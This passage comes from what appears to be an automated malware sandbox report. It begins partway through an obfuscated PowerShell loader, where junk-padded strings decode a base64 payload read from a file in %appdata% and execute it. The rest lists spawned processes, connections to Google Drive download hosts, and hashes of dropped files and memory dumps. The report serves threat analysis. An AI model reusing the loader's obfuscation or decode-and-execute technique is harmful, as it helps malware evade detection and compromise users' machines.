DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 820 -ip 820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 820 -s 2360

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 198.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 fe699e7801de060d278808932c5fc6d2
SHA1 cefc085de999f6333d1d9c4659f8b6c39e5c2631
SHA256 6748e39a430292a4e2131e78930855a5352d4f28db60f5ce38c850e81ff5fd92
SHA512 d4b2ed06b608eb2389a8b34d8cb7a6c17aa32725f2834b8dd01d74c75c492cc5e72f133c7ffe7d6ec981fd830ea8faf4c00f3067b45e4b6fe8788fcaad6a176b

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 afc5e05f116fe2c4fcd104c0218ed209
SHA1 83d46b9bccfc9d3da86fff3b552600bdaff9aad0
SHA256 6e0fdd835f071ea9e34ba392b93e3fef994a53486aa5eab039127b3ae49024b3
SHA512 0e6200dc7d7eecc4e1bf3d7afd1ee4e03ff0334310147b82eb9fda145b6b81c3e4eb87c0bcf5d3a746816b0a929dc000fbab6daa7aea98341d56d2e589072d41

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 0daa8b536653bad441d95c2a2d0599e3
SHA1 21c8c8279bb40581e0667de6d15010f0bef0c206
SHA256 effc4e7de9249dba82434429fcc89b730f9d0d5e8064915673f2cccca995b098
SHA512 148daf06032180161585c7230393cbf62f20d3278da66ae8b19c67da7f39e2fe229ce94fb4ec8ada17353236aeeae6cd0e679bac0089034973be04d910fea509

memory/1396-311-0x000001DC3EA90000-0x000001DC3EAB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cokylfm.4us.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1396-321-0x00007FFA92440000-0x00007FFA92F01000-memory.dmp

memory/1396-322-0x000001DC3EAF0000-0x000001DC3EB00000-memory.dmp

memory/1396-323-0x00007FFA92440000-0x00007FFA92F01000-memory.dmp

memory/1396-325-0x000001DC3EAF0000-0x000001DC3EB00000-memory.dmp

memory/1396-326-0x000001DC3EAF0000-0x000001DC3EB00000-memory.dmp

memory/820-328-0x0000000002C60000-0x0000000002C96000-memory.dmp

memory/820-329-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/820-330-0x00000000058B0000-0x0000000005ED8000-memory.dmp

memory/820-331-0x00000000056C0000-0x00000000056E2000-memory.dmp

memory/820-332-0x0000000005760000-0x00000000057C6000-memory.dmp

memory/820-333-0x00000000057D0000-0x0000000005836000-memory.dmp

memory/820-343-0x0000000005F90000-0x00000000062E4000-memory.dmp

memory/820-344-0x0000000006590000-0x00000000065AE000-memory.dmp

memory/820-345-0x00000000065D0000-0x000000000661C000-memory.dmp

memory/820-346-0x0000000007DF0000-0x000000000846A000-memory.dmp

memory/820-347-0x0000000006B20000-0x0000000006B3A000-memory.dmp

memory/820-348-0x0000000007840000-0x00000000078D6000-memory.dmp

memory/820-349-0x00000000077D0000-0x00000000077F2000-memory.dmp

memory/820-350-0x0000000008A20000-0x0000000008FC4000-memory.dmp

C:\Users\Admin\AppData\Roaming\gennemsgnings.Fas

MD5 eef3f42f8568ec1d96e3fc1a3174c27f
SHA1 b58f1fae7aeb4f69389a46d62fb110c5bf0b39a2
SHA256 f87d719b62b1b6a582ae647b47dcb70855495c65307cc786ebaf1580a7f1628e
SHA512 f386755db46e2454711107f92c6ebc47dbfb50d047ddc296304703223928f5a1e8a6156e05e1544e2fd9b07cf63a5fdf54a16ce3010f650670c828f8ee4d37dc

memory/820-352-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/1396-355-0x00007FFA92440000-0x00007FFA92F01000-memory.dmp